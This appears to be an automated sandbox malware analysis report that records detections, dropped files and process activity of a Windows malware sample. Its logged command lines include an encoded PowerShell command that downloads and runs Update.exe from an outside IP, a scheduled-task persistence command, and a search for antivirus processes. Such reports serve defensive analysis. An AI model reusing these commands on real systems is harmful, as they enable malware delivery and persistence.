ProcessName: schtasks.exe
            Sigma detected: Suspicious Execution of Powershell with Base64
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ParentProcessId: 8156, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A", ProcessId: 2504, ProcessName: powershell.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7740, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 7788, ProcessName: schtasks.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js", ProcessId: 7848, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe, ParentProcessId: 8156, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A", ProcessId: 2504, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Search for Antivirus process
            Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Returning Returning.cmd & Returning.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7620, ProcessName: findstr.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-26T23:14:50.751983+0200
            SID:2022930
            Source Port:443
            Destination Port:49742
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T23:14:12.507424+0200
            SID:2022930
            Source Port:443
            Destination Port:49735
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://51.77.140.74/pages/Update.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1329574
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 66%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
            Machine Learning detection for dropped file
            Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: hfi47s4wOT.exeJoe Sandbox ML: detected
            Source: hfi47s4wOT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: hfi47s4wOT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553754278.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581652788.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554227347.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582430105.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Update.exe, 0000001E.00000003.2548897074.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576594870.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550044909.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577861683.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548464605.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576123019.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000016.00000000.1850988124.00000000004D2000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551603162.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579808570.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553323331.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581265248.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554435598.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582580094.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Update.exe, 0000001E.00000003.2546679712.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573261140.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549367463.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577316736.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551970873.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580209702.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551291268.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579340928.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553150928.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580922538.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Ce.pdbl source: powershell.exe, 0000001F.00000002.2588953334.0000000007B68000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548615916.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576253902.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550458834.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578357507.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548099904.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575850140.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548755612.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576414574.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2552773241.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580511161.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000016.00000000.1850988124.00000000004D2000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550786908.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578871941.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2555005689.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582961103.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549202050.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577178272.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Update.exe, 0000001E.00000003.2551434668.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579477421.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550304212.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578131812.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2548266259.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575973679.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2552306150.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580389434.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Update.exe, 0000001E.00000003.2546679712.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573261140.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Update.exe, 0000001E.00000003.2549872399.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577736838.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553900158.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581951383.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.pdb source: powershell.exe, 0000001F.00000002.2587901578.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000001F.00000002.2587901578.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Update.exe, 0000001E.00000003.2550595462.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2578702786.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550182365.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577983295.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.pdbq source: powershell.exe, 0000001F.00000002.2588673938.0000000007B51000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2555177021.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2583201383.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2550964956.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579007923.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551750599.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2580016797.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2551166924.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2579170809.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Update.exe, 0000001E.00000003.2549044276.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2576749520.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554072215.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582276254.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549736844.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577597124.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2549571981.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2577442046.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2553606718.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2581482803.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Update.exe, 0000001E.00000003.2554703024.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2582709014.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042E1AC GetFileAttributesW,FindFirstFileW,FindClose,19_2_0042E1AC
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043A29A FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_0043A29A
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00436406 FindFirstFileW,FindNextFileW,FindClose,19_2_00436406
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003FC5F3 FindFirstFileExW,19_2_003FC5F3
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043705D FindFirstFileW,FindClose,19_2_0043705D
